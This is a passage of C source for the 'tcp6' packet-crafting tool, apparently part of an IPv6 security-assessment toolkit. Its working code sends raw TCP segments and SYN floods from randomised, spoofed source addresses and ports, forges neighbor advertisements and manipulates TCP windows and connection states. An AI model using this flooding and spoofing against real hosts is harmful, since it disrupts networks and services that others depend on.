timeout.tv_sec= (rto < 1)?rto:1; if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } #if !defined(sun) && !defined(__sun) && !defined(__linux__) if(sel && FD_ISSET(idata.fd, &rset)){ #else if(TRUE){ #endif /* Read a packet */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 1 && pktdata != NULL){ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); pkt_tcp= (struct tcp_hdr *) ( (char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_ns= (struct nd_neighbor_solicit *) ( (char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; pkt_tcp_flags= pkt_tcp->th_flags; /* Check that we are able to look into the IPv6 header */ if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN)) continue; if(is_eq_in6_addr(&(pkt_ipv6->ip6_src), &(idata.srcaddr))){ continue; } if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata.srcaddr))){ continue; } if(pkt_tcp->th_sport != htons(dstport)){ continue; } if(pkt_tcp->th_dport != htons(srcport)){ continue; } /* The TCP checksum must be valid */ if(in_chksum(pkt_ipv6, pkt_tcp, pkt_end-((unsigned char *)pkt_tcp), IPPROTO_TCP) != 0) continue; printf("RESPONSE:TCP6:%s%s%s%s%s%s:\n", ((pkt_tcp_flags & TH_FIN)?"F":""), \ ((pkt_tcp_flags & TH_SYN)?"S":""), \ ((pkt_tcp_flags & TH_RST)?"R":""), ((pkt_tcp_flags & TH_PUSH)?"P":""),\ ((pkt_tcp_flags & TH_ACK)?"A":""), ((pkt_tcp_flags & TH_URG)?"U":"")); exit(EXIT_SUCCESS); } } } puts("RESPONSE:TIMEOUT:"); exit(EXIT_SUCCESS); } /* Fire a TCP segment if an IPv6 Destination Address was specified */ if(!listen_f && idata.dstaddr_f){ if(loop_f){ if(idata.verbose_f) printf("Sending TCP segments every %u second%s...\n", nsleep, \ ((nsleep>1)?"s":"")); } do{ send_packet(&idata, NULL, NULL); if(loop_f && (sel=select(0, NULL, NULL, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } }while(loop_f); if(idata.verbose_f) puts("Initial attack packet(s) sent successfully."); exit(EXIT_SUCCESS); } else if(listen_f){ FD_ZERO(&sset); FD_SET(idata.fd, &sset); if(idata.verbose_f){ print_filters(&idata, &filters); puts("Listening to incoming IPv6 messages..."); } while(listen_f){ rset= sset; timeout= stimeout; #if !defined(sun) && !defined(__sun) && !defined(__linux__) if((sel=select(idata.fd+1, &rset, NULL, NULL, ((floods_f || floodp_f) && !donesending_f)?(&timeout):NULL)) == -1){ #else timeout.tv_usec=1000; timeout.tv_sec= 0; if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ #endif if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } /* If there are some bits set, we need to check whether it's time to send packets */ #if !defined(sun) && !defined(__sun) && !defined(__linux__) if(sel){ #else if(TRUE){ #endif if(gettimeofday(&curtime, NULL) == -1){ if(idata.verbose_f) perror("tcp6"); exit(EXIT_FAILURE); } if(window == WIN_MODULATE){ if(tcpwinm == win1_size){ if( (curtime.tv_sec - wmtimeout.tv_sec) >= time1_len){ wmtimeout= curtime; tcpwinm = win2_size; } } else{ if( (curtime.tv_sec - wmtimeout.tv_sec) >= time2_len){ wmtimeout= curtime; tcpwinm = win1_size; } } } } #if !defined(sun) && !defined(__sun) && !defined(__linux__) if(sel && FD_ISSET(idata.fd, &rset)){ #else if(TRUE){ #endif /* Read a packet */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 1 && pktdata != NULL){ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); pkt_tcp= (struct tcp_hdr *) ( (char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_ns= (struct nd_neighbor_solicit *) ( (char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* Check that we are able to look into the IPv6 header */ if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN)) continue; accepted_f=0; if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK)){ if(filters.nblocklinksrc){ if(match_ether(filters.blocklinksrc, filters.nblocklinksrc, &(pkt_ether->src))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblocklinkdst){ if(match_ether(filters.blocklinkdst, filters.nblocklinkdst, &(pkt_ether->dst))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } } if(filters.nblocksrc){ if(match_ipv6(filters.blocksrc, filters.blocksrclen, filters.nblocksrc, &(pkt_ipv6->ip6_src))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblockdst){ if(match_ipv6(filters.blockdst, filters.blockdstlen, filters.nblockdst, &(pkt_ipv6->ip6_dst))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK)){ if(filters.nacceptlinksrc){ if(match_ether(filters.acceptlinksrc, filters.nacceptlinksrc, &(pkt_ether->src))) accepted_f=1; } if(filters.nacceptlinkdst && !accepted_f){ if(match_ether(filters.acceptlinkdst, filters.nacceptlinkdst, &(pkt_ether->dst))) accepted_f= 1; } } if(filters.nacceptsrc && !accepted_f){ if(match_ipv6(filters.acceptsrc, filters.acceptsrclen, filters.nacceptsrc, &(pkt_ipv6->ip6_src))) accepted_f= 1; } if(filters.nacceptdst && !accepted_f){ if(match_ipv6(filters.acceptdst, filters.acceptdstlen, filters.nacceptdst, &(pkt_ipv6->ip6_dst))) accepted_f=1; } if(filters.acceptfilters_f && !accepted_f){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } if(idata.verbose_f>1) print_filter_result(&idata, pktdata, ACCEPTED); if(pkt_ipv6->ip6_nxt == IPPROTO_TCP){ /* Check that we are able to look into the TCP header */ if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN + sizeof(struct tcp_hdr))){ continue; } if(idata.dstaddr_f){ if(!floods_f){ /* Discard our own packets */ if(is_eq_in6_addr(&(pkt_ipv6->ip6_src), &(idata.srcaddr))){ continue; } if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata.srcaddr))){ continue; } } else{ /* Discard our own packets */ if(!is_eq_in6_addr(&(pkt_ipv6->ip6_src), &(idata.dstaddr))){ continue; } if(useaddrkey_f){ if( (ntohl(pkt_ipv6->ip6_src.s6_addr32[2]) & 0x0000ffff) == ( (uint16_t)(ntohl(pkt_ipv6->ip6_src.s6_addr32[2])>>16) ^ addr_key) && \ (ntohl(pkt_ipv6->ip6_src.s6_addr32[3]) & 0x0000ffff) == ( (uint16_t)(ntohl(pkt_ipv6->ip6_src.s6_addr32[3])>>16) ^ addr_key)){ continue; } if( (ntohl(pkt_ipv6->ip6_dst.s6_addr32[2]) & 0x0000ffff) != ((uint16_t)(ntohl(pkt_ipv6->ip6_dst.s6_addr32[2]) >> 16) ^ addr_key) || \ (ntohl(pkt_ipv6->ip6_dst.s6_addr32[3]) & 0x0000ffff) != ((uint16_t)(ntohl(pkt_ipv6->ip6_dst.s6_addr32[3])>>16) ^ addr_key)){ continue; } } } /* The TCP checksum must be valid */ if(in_chksum(pkt_ipv6, pkt_tcp, pkt_end-((unsigned char *)pkt_tcp), IPPROTO_TCP) != 0) continue; if(pkt_tcp->th_sport != htons(dstport)){ continue; } if(!floodp_f && pkt_tcp->th_dport != htons(srcport)){ continue; } } /* Send a TCP segment */ send_packet(&idata, pktdata, pkthdr); } else if(pkt_ipv6->ip6_nxt == IPPROTO_ICMPV6){ /* Check that we are able to look into the NS header */ if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN + sizeof(struct nd_neighbor_solicit))){ continue; } if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK)){ if(floods_f){ if(useaddrkey_f){ if( (ntohl(pkt_ns->nd_ns_target.s6_addr32[2]) & 0x0000ffff) != ( (ntohl(pkt_ns->nd_ns_target.s6_addr32[2]) >>16) ^ addr_key) || \ (ntohl(pkt_ns->nd_ns_target.s6_addr32[3]) & 0x0000ffff) != ( (ntohl(pkt_ns->nd_ns_target.s6_addr32[3]) >>16) ^ addr_key)){ continue; } } /* Check that the target address belongs to the prefix from which we are sending packets */ if(!match_ipv6(&(idata.srcaddr), &idata.srcpreflen, 1, &(pkt_ns->nd_ns_target))){ continue; } } else{ if(!is_eq_in6_addr( &(pkt_ns->nd_ns_target), &(idata.srcaddr)) ){ continue; } } if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ puts("Error sending Neighbor Advertisement"); exit(EXIT_FAILURE); } } } } } if(idata.dstaddr_f && !donesending_f && is_time_elapsed(&curtime, &lastprobe, pktinterval)){ lastprobe= curtime; send_packet(&idata, NULL, NULL); } } exit(EXIT_SUCCESS); } if(!(idata.dstaddr_f) && !listen_f){ puts("Error: Nothing to send! (Destination Address left unspecified, and not using listening mode)"); exit(EXIT_FAILURE); } exit(EXIT_SUCCESS); } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ struct dlt_null *dlt_null; ethernet= (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB){ ethernet->ether_type = htons(ETHERTYPE_IPV6); if(!(idata->flags & IFACE_LOOPBACK)){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; } } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } #if defined (__OpenBSD__) else if(idata->type == DLT_LOOP){ dlt_null->family= htonl(PF_INET6); } #endif ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(idata->fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+idata->mtu)){ puts("Unfragmentable part too large for current MTU"); exit(EXIT_FAILURE); } /* We prepare a separete Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ memset(&fraghdr, 0, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+ idata->max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_TCP; startofprefixes=ptr; } /* * Function: send_packet() * * Initialize the remaining fields of the TCP segment, and send the attack packet(s). */ void send_packet(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr *pkthdr){ static unsigned int sources=0, ports=0; ptr=startofprefixes; startclose_f= 0; senddata_f= 0; if(pktdata != NULL){ /* Sending a TCP segment in response to a received packet */ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_tcp= (struct tcp_hdr *)( (char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_ipv6 + sizeof(struct ip6_hdr) + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_ipv6 + sizeof(struct ip6_hdr) + pkt_ipv6->ip6_plen; pkt_ipv6addr = &(pkt_ipv6->ip6_src); /* We don't send any packets if the Source Address of the captured packet is the unspecified address or a multicast address */ if(IN6_IS_ADDR_UNSPECIFIED(pkt_ipv6addr) || IN6_IS_ADDR_MULTICAST(pkt_ipv6addr)){ return; } else{ ipv6->ip6_dst = pkt_ipv6->ip6_src; if(idata->type == DLT_EN10MB && !(idata->flags & IFACE_LOOPBACK)) ethernet->dst = pkt_ether->src; } pkt_ipv6addr = &(pkt_ipv6->ip6_dst); /* We do not send any packets if the Destination Address of the captured packet is the unspecified address or a multicast address */ if(IN6_IS_ADDR_MULTICAST(pkt_ipv6addr) || IN6_IS_ADDR_MULTICAST(pkt_ipv6addr)){ return; } else{ ipv6->ip6_src = pkt_ipv6->ip6_dst; if(idata->type == DLT_EN10MB && !(idata->flags & IFACE_LOOPBACK)) ethernet->src = pkt_ether->dst; } if( (ptr+sizeof(struct tcp_hdr)) > (v6buffer+ idata->max_packet_size)){ puts("Packet Too Large while inserting TCP header"); exit(EXIT_FAILURE); } /* If we are setting the flags automatically, do not respond to RST segments */ if((tcpflags_auto_f || tcpopen_f || tcpclose_f) && pkt_tcp->th_flags & TH_RST) return; tcp = (struct tcp_hdr *) ptr; memset(tcp, 0, sizeof(struct tcp_hdr)); tcp->th_sport= pkt_tcp->th_dport; tcp->th_dport= pkt_tcp->th_sport; if(tcpseq_f) tcp->th_seq= htonl(tcpseq); else tcp->th_seq = pkt_tcp->th_ack; if( pkt_tcp->th_flags & TH_SYN){ if(tcpopen_f){ if(tcpopen == OPEN_PASSIVE){ /* If it is a pure SYN, respond with a SYN/ACK */ if(!(pkt_tcp->th_flags & TH_ACK)){ tcp->th_flags = tcp->th_flags | TH_SYN | TH_ACK; tcp->th_seq= random(); tcp->th_ack= htonl(ntohl(pkt_tcp->th_seq) + ((pkt_end - (unsigned char *)pkt_tcp) - (pkt_tcp->th_off << 2))); tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_tcp->th_flags & TH_FIN)?1:0) + \ ((pkt_tcp->th_flags & TH_SYN)?1:0)); } } else if(tcpopen == OPEN_SIMULTANEOUS){ /* If it is a pure SYN, respond with a SYN */ if(!(pkt_tcp->th_flags & TH_ACK)){ tcp->th_flags = tcp->th_flags | TH_SYN; tcp->th_seq= random(); tcp->th_ack= 0; } else{ /* If we receive a SYN/ACK (product of the above SYN), send a SYN/ACK */ tcp->th_flags = tcp->th_flags | TH_SYN | TH_ACK; tcp->th_seq= (pkt_tcp->th_ack) - (rhbytes + 1); tcp->th_ack= htonl(ntohl(pkt_tcp->th_seq) + ((pkt_end - (unsigned char *)pkt_tcp) - (pkt_tcp->th_off << 2))); tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_tcp->th_flags & TH_FIN)?1:0) + \ ((pkt_tcp->th_flags & TH_SYN)?1:0)); if(data_f) senddata_f= 1; } } else if(tcpopen == OPEN_ABORT){ /* If we receive a SYN, send RST */ tcp->th_flags = tcp->th_flags | TH_RST | TH_ACK; if(pkt_tcp->th_flags & TH_ACK) tcp->th_seq= pkt_tcp->th_ack; else tcp->th_seq= 0; tcp->th_ack= htonl(ntohl(pkt_tcp->th_seq) + ((pkt_end - (unsigned char *)pkt_tcp) - (pkt_tcp->th_off << 2))); tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_tcp->th_flags & TH_FIN)?1:0) + \ ((pkt_tcp->th_flags & TH_SYN)?1:0)); } } else{ /* We have received a SYN/ACK */ if(pkt_tcp->th_flags & TH_ACK){ /* It's a SYN/ACK, and we are doing an active open */ if(tcpack_f){ tcp->th_ack= htonl(tcpack); } else{ if( !tcpflags_f || (tcpflags_f && (tcpflags & TH_ACK))){ tcp->th_ack= pkt_tcp->th_seq; if(ackdata_f){ tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_end - (unsigned char *)pkt_tcp) - (pkt_tcp->th_off << 2))); } if(ackflags_f){ tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_tcp->th_flags & TH_FIN)?1:0) + \ ((pkt_tcp->th_flags & TH_SYN)?1:0)); } } } if(tcpflags_f){ tcp->th_flags= tcpflags; } else{ tcp->th_flags= TH_ACK; /* If the incoming packet was a SYN, we should respond with a SYN/ACK */ if( (pkt_tcp->th_flags & TH_SYN) && !(pkt_tcp->th_flags & TH_ACK)) tcp->th_flags = tcp->th_flags | TH_SYN; } if(data_f) senddata_f= 1; if(tcpclose_f && tcpclose != CLOSE_FIN_WAIT_2 && tcpclose != CLOSE_PASSIVE) startclose_f= 1; } else{ /* Simple SYN segment */ if(tcpack_f){ tcp->th_ack= htonl(tcpack); } else{ if( !tcpflags_f || (tcpflags_f && (tcpflags & TH_ACK))){ tcp->th_ack= pkt_tcp->th_seq; if(ackdata_f){ tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_end - (unsigned char *)pkt_tcp) - (pkt_tcp->th_off << 2))); } if(ackflags_f){ tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_tcp->th_flags & TH_FIN)?1:0) + \ ((pkt_tcp->th_flags & TH_SYN)?1:0)); } } } if(tcpflags_f){ tcp->th_flags= tcpflags; } else{ tcp->th_flags= TH_ACK; /* If the incoming packet was a SYN, we should respond with a SYN/ACK */ if( (pkt_tcp->th_flags & TH_SYN) && !(pkt_tcp->th_flags & TH_ACK)) tcp->th_flags = tcp->th_flags | TH_SYN; } } } tcp->th_win= htons(tcpwin); } else if(pkt_tcp->th_flags & TH_FIN){ if(tcpclose_f && (tcpclose == CLOSE_SIMULTANEOUS || tcpclose == CLOSE_PASSIVE || tcpclose == CLOSE_ABORT)){ if(tcpclose == CLOSE_SIMULTANEOUS){ tcp->th_flags = TH_ACK | TH_FIN; tcp->th_seq= pkt_tcp->th_ack; tcp->th_ack= pkt_tcp->th_seq; } else if(tcpclose == CLOSE_PASSIVE){ tcp->th_flags = TH_ACK | TH_FIN; tcp->th_seq= pkt_tcp->th_ack; tcp->th_ack= htonl(ntohl(pkt_tcp->th_seq) + ((pkt_end - (unsigned char *)pkt_tcp) - (pkt_tcp->th_off << 2))); tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_tcp->th_flags & TH_FIN)?1:0) + \ ((pkt_tcp->th_flags & TH_SYN)?1:0)); } else if(tcpclose == CLOSE_ABORT){ tcp->th_flags = TH_ACK | TH_RST; tcp->th_seq= pkt_tcp->th_ack; tcp->th_ack= htonl(ntohl(pkt_tcp->th_seq) + ((pkt_end - (unsigned char *)pkt_tcp) - (pkt_tcp->th_off << 2))); tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_tcp->th_flags & TH_FIN)?1:0) + \ ((pkt_tcp->th_flags & TH_SYN)?1:0)); } } else{ if(tcpflags_f){ tcp->th_flags= tcpflags; } else{ tcp->th_flags= TH_ACK; } if(tcpack_f){ tcp->th_ack= htonl(tcpack); } else{ if( !tcpflags_f || (tcpflags_f && (tcpflags & TH_ACK))){ tcp->th_ack= pkt_tcp->th_seq; if(ackdata_f){ tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_end - (unsigned char *)pkt_tcp) - (pkt_tcp->th_off << 2))); } if(ackflags_f && !(tcpclose_f && tcpclose == CLOSE_LAST_ACK) && !(tcpclose_f && tcpclose == CLOSE_FIN_WAIT_1)){ tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_tcp->th_flags & TH_FIN)?1:0) + \ ((pkt_tcp->th_flags & TH_SYN)?1:0)); } } } } if(window_f){ if(window == WIN_CLOSED){ tcp->th_win= htons(0); } else if(window == WIN_MODULATE){ tcp->th_win= htons(tcpwinm); } } else tcp->th_win= htons(tcpwin); } else if(pkt_tcp->th_flags & TH_ACK){ if(tcpclose_f && tcpclose == CLOSE_ABORT){ tcp->th_flags = TH_ACK | TH_RST; tcp->th_seq= pkt_tcp->th_ack; tcp->th_ack= htonl(ntohl(pkt_tcp->th_seq) + ((pkt_tcp->th_flags & TH_FIN)?1:0) + \ ((pkt_tcp->th_flags & TH_SYN)?1:0)); } else{ if(tcpflags_f){ tcp->th_flags= tcpflags; } else{ tcp->th_flags= TH_ACK; } if(tcpack_f){ tcp->th_ack= htonl(tcpack); } else{ if( !tcpflags_f || (tcpflags_f && (tcpflags & TH_ACK))){ tcp->th_ack= pkt_tcp->th_seq; if(ackdata_f){ tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_end - (unsigned char *)pkt_tcp) - (pkt_tcp->th_off << 2))); } if(ackflags_f){ tcp->th_ack= htonl(ntohl(tcp->th_ack) + ((pkt_tcp->th_flags & TH_FIN)?1:0) + \ ((pkt_tcp->th_flags & TH_SYN)?1:0)); } } } } if(window_f){ if(window == WIN_CLOSED){ tcp->th_win= htons(0); } else if(window == WIN_MODULATE){ tcp->th_win= htons(tcpwinm); } } else tcp->th_win= htons(tcpwin); } tcp->th_urp= htons(tcpurg); /* Current version of tcp6 does not support sending TCP options */ tcp->th_off= sizeof(struct tcp_hdr) >> 2; ptr+= tcp->th_off << 2; if(rhbytes_f){ if( (ptr + rhbytes) > v6buffer+ idata->max_packet_size){ puts("Packet Too Large while inserting TCP segment"); exit(EXIT_FAILURE); } while(rhbytes>=4){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); rhbytes -= sizeof(uint32_t); } while(rhbytes>0){ *(uint8_t *) ptr= (uint8_t) random(); ptr++; rhbytes--; } } tcp->th_sum = 0; tcp->th_sum = in_chksum(v6buffer, tcp, ptr-((unsigned char *)tcp), IPPROTO_TCP); frag_and_send(idata); if(senddata_f){ tcp->th_seq= htonl( ntohl(tcp->th_seq) + ptr-((unsigned char *)tcp + (tcp->th_off << 2))); ptr= (unsigned char *)tcp + sizeof(struct tcp_hdr); if((ptr+ datalen) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting TCP data"); exit(EXIT_FAILURE); } memcpy(ptr, data, datalen); ptr+= datalen; if(window_f){ if(window == WIN_CLOSED) tcp->th_win = htons(0); else tcp->th_win = htons((uint16_t) win1_size); } else{ tcp->th_win = htons(tcpwin); } tcp->th_sum = 0; tcp->th_sum = in_chksum(v6buffer, tcp, ptr-((unsigned char *)tcp), IPPROTO_TCP); frag_and_send(idata); } if(startclose_f){ tcp->th_seq= htonl( ntohl(tcp->th_seq) + ptr-((unsigned char *)tcp + (tcp->th_off << 2))); ptr= (unsigned char *) tcp + sizeof(struct tcp_hdr); if(tcpclose == CLOSE_ABORT){ tcp->th_flags= TH_ACK | TH_RST; } else if(tcpclose == CLOSE_ACTIVE || tcpclose == CLOSE_LAST_ACK){ tcp->th_flags= TH_ACK | TH_FIN; } tcp->th_sum = 0; tcp->th_sum = in_chksum(v6buffer, tcp, ptr-((unsigned char *)tcp), IPPROTO_TCP); frag_and_send(idata); } return; } else{ if(ports >= nports){ sources++; ports= 0; } if(sources >= nsources){ if(loop_f){ sources= 0; } else{ donesending_f= 1; return; } } if( (ptr+sizeof(struct tcp_hdr)) > (v6buffer + idata->max_packet_size)){ puts("Packet Too Large while inserting TCP header"); exit(EXIT_FAILURE); } tcp= (struct tcp_hdr *) ptr; memset(ptr, 0, sizeof(struct tcp_hdr)); tcp->th_sport= htons(srcport); tcp->th_dport= htons(dstport); tcp->th_seq = htonl(tcpseq); if(tcpack_f || (tcpflags & TH_ACK)) tcp->th_ack= htonl(tcpack); else tcp->th_ack= 0; if(tcpflags_auto_f || tcpopen_f || tcpclose_f){ tcp->th_flags= TH_SYN; } else{ tcp->th_flags= tcpflags; } tcp->th_urp= htons(tcpurg); tcp->th_win= htons(tcpwin); tcp->th_off= sizeof(struct tcp_hdr) >> 2; ptr += tcp->th_off << 2; if( (ptr + rhbytes) > v6buffer + idata->max_packet_size){ puts("Packet Too Large while inserting TCP segment"); exit(EXIT_FAILURE); } while(rhbytes>=4){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); rhbytes -= sizeof(uint32_t); } while(rhbytes>0){ *(uint8_t *) ptr= (uint8_t) random(); ptr++; rhbytes--; } if(pktdata == NULL && (floods_f && ports == 0)){ /* Randomizing the IPv6 Source address based on the prefix specified by "srcaddr" and srcpreflen. */ randomize_ipv6_addr( &(ipv6->ip6_src), &(idata->srcaddr), idata->srcpreflen); /* If we need to respond to incomming packets, we set the Interface ID such that we can detect which IPv6 addresses we have used. */ if(listen_f && useaddrkey_f){ ipv6->ip6_src.s6_addr32[2]= ntohl((uint32_t)random() <<16); ipv6->ip6_src.s6_addr32[2]= htonl(ntohl(ipv6->ip6_src.s6_addr32[2]) | ((ntohl(ipv6->ip6_src.s6_addr32[2])>>16) ^ addr_key)); ipv6->ip6_src.s6_addr32[3]= ntohl((uint32_t)random() <<16); ipv6->ip6_src.s6_addr32[3]= htonl(ntohl(ipv6->ip6_src.s6_addr32[3]) | (uint32_t)((ntohl(ipv6->ip6_src.s6_addr32[3]) >>16) ^ addr_key)); } if(idata->type == DLT_EN10MB && !(idata->flags & IFACE_LOOPBACK) && !(idata->hsrcaddr_f)){ for(i=0; i<6; i++) ethernet->src.a[i]= random(); } } if(pktdata == NULL && floodp_f){ tcp->th_sport= random(); } tcp->th_sum = 0; tcp->th_sum = in_chksum(v6buffer, tcp, ptr-((unsigned char *)tcp), IPPROTO_TCP); frag_and_send(idata); if(pktdata == NULL) ports++; return; } } /* * Function: frag_and_send() * * Send an IPv6 datagram, and fragment if selected */ void frag_and_send(struct iface_data *idata){ if(!idata->fragh_f){ ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", \ (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } else{ ptrend= ptr; ptr= fragpart; fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + idata->linkhsize); fptrend = fptr + idata->linkhsize+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD; memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); if( (fptr+FRAG_HDR_SIZE)> fptrend){ puts("Unfragmentable Part is Too Large"); exit(EXIT_FAILURE); } memcpy(fptr, (char *) &fraghdr, FRAG_HDR_SIZE); fh= (struct ip6_frag *) fptr; fh->ip6f_ident=random(); startoffragment = fptr + FRAG_HDR_SIZE; /* * Check that the selected fragment size is not larger than the largest * fragment size that can be sent */ if(nfrags <= (fptrend - fptr)) fragsize=nfrags; else fragsize= (fptrend-fptr) & IP6F_OFF_MASK; m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - idata->linkhsize); if((nw=pcap_inject(idata->pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", \ (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } /* Sending fragments */ } /* Sending fragmented datagram */ } /* * Function: usage() * * Prints the syntax of the tcp6 tool */ void usage(void){ puts("usage: tcp6 [-i INTERFACE] [-S LINK_SRC_ADDR] [-D LINK-DST-ADDR] " "[-s SRC_ADDR[/LEN]] [-d DST_ADDR] [-A HOP_LIMIT] 